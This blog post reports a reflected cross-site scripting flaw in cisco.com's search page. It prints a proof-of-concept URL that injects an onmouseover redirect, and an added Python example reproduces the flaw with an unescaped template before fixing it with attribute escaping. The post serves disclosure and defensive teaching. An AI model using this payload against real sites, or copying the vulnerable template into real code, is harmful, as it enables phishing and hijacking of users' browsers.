
Cisco.com XSS Vulnerability Found

A few days back, I read about a Cross-Site Scripting vulnerability in Cisco's search engine. This vulnerability enables a hacker to use the cisco.com website for phishing purposes and for "man-in-the-browser" attacks.

With the code (posted as a link) below, one could send a user to Cisco's website and bounce them off to his own bogus machine. I did not check for any further enrichments of this exploit, but it seems strange that this kind of thing could come out on a website that is supposed to be as secure as cisco.com. I really believe that there are application-layer firewalls defending Cisco's website, and if there are any - are they misconfigured?

I have reported this vulnerability to a friend of mine on Cisco's Security Professional Services team in EMEA, and I hope this will soon be fixed.

Here is the PoC code:

http://cisco.com/pcgi-bin/search/search.pl?searchPhrase=%27+onmouseover%3D%22location.href%3D%28%27http%3A%2F%2Fwww.cnn.com%27%29%22+value%3D%27&x=20&y=15&accessLevel=Guest&language=en&country=US&Search+All+Cisco.com=cisco.com

Notice that the code bounces you to the www.cnn.com website, but anything could be put there, which makes you wonder...

Anyway, I cannot credit this code to any specific hacker or hacking group, because I have seen similar code at more than one of my sources, each from a different country. Strangely enough, they all came out within the same 24 hours. Script kiddies?

As my Cisco friend promised me, this is not a lightweight issue for a company of that size, and I believe that the fix will come very soon.
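To show what the PoC above actually exploits, here is an added example (my own, not code from the post or from Cisco): the searchPhrase parameter is reflected into a single-quoted input value attribute, so a phrase beginning with a quote closes the attribute and the rest becomes an event handler. The search form template below is a constructed stand-in for the real page, shown beside a hardened version that escapes the phrase for the attribute context; only the query string of the PoC URL is reused.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Query string taken from the PoC link in the post; the bounce target is the post's own.
POC_URL = ("http://cisco.com/pcgi-bin/search/search.pl?searchPhrase=%27+onmouseover%3D"
           "%22location.href%3D%28%27http%3A%2F%2Fwww.cnn.com%27%29%22+value%3D%27"
           "&x=20&y=15&accessLevel=Guest&language=en&country=US")


def search_phrase(url: str) -> str:
    """URL-decode the searchPhrase parameter the way the CGI script would receive it."""
    return parse_qs(urlsplit(url).query)["searchPhrase"][0]


def render_vulnerable(phrase: str) -> str:
    """Constructed stand-in for the flaw: the phrase is echoed raw into a quoted attribute."""
    return f"<input type='text' name='searchPhrase' value='{phrase}'>"


def render_hardened(phrase: str) -> str:
    """Same template with attribute-context escaping; quote=True also escapes ' and \"."""
    return f"<input type='text' name='searchPhrase' value='{html.escape(phrase, quote=True)}'>"


class _InputAttrs(HTMLParser):
    """Collects the attributes a browser would see on the <input> element (entities decoded)."""
    def __init__(self):
        super().__init__()
        self.attrs = []  # list of (name, value) pairs, duplicates included

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs.extend(attrs)


def parsed_input_attrs(rendered: str) -> dict:
    parser = _InputAttrs()
    parser.feed(rendered)
    return dict(parser.attrs)  # a later duplicate overwrites an earlier one; fine for this check


def event_handlers(rendered: str) -> list:
    """Names of on* attributes that ended up on the element, i.e. injected script hooks."""
    return sorted(k for k in parsed_input_attrs(rendered) if k.startswith("on"))


if __name__ == "__main__":
    phrase = search_phrase(POC_URL)
    print("vulnerable handlers:", event_handlers(render_vulnerable(phrase)))  # ['onmouseover']
    print("hardened handlers:  ", event_handlers(render_hardened(phrase)))    # []
```

With the hardened template the same phrase survives only as the attribute's text value, which is exactly what an attribute-aware output encoder (or a correctly tuned application-layer firewall rule) should enforce.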



About

    My name is Barry Shteiman. This is my blog, which deals with information security and with technology and science in general.
